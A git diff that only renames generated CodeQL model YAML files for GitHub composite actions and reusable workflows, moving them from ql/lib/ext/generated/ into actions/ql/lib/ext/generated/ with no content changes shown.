diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/actions/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml rename to actions/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/actions/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml rename to actions/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/actions/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml rename to actions/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/actions/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml rename to actions/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/actions/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml rename to actions/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/actions/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml rename to actions/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/actions/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml rename to actions/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/actions/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml rename to actions/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/actions/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml rename to actions/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/actions/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml rename to actions/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml rename to actions/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml rename to actions/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml rename to actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml rename to actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml rename to actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/actions/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml rename to actions/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/actions/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml rename to actions/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/actions/ql/lib/ext/generated/composite-actions/stellar_go.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/stellar_go.model.yml rename to actions/ql/lib/ext/generated/composite-actions/stellar_go.model.yml diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/actions/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml rename to actions/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/actions/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/subquery_subql.model.yml rename to actions/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml rename to actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml rename to actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/actions/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml rename to actions/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/actions/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml rename to actions/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/actions/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml rename to actions/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/actions/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml rename to actions/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/actions/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml rename to actions/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/actions/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml rename to actions/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/actions/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml rename to actions/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/actions/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml rename to actions/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml rename to actions/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/actions/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml rename to actions/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/actions/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml rename to actions/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/actions/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml rename to actions/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/actions/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml rename to actions/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/actions/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml rename to actions/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/actions/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml rename to actions/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/actions/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml rename to actions/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/actions/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml rename to actions/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/actions/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml rename to actions/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/actions/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml rename to actions/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/actions/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml rename to actions/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/actions/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml rename to actions/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/actions/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml rename to actions/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/actions/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml rename to actions/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/actions/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml rename to actions/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/actions/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml
diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml
similarity index 100%
rename from ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml
rename to actions/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml
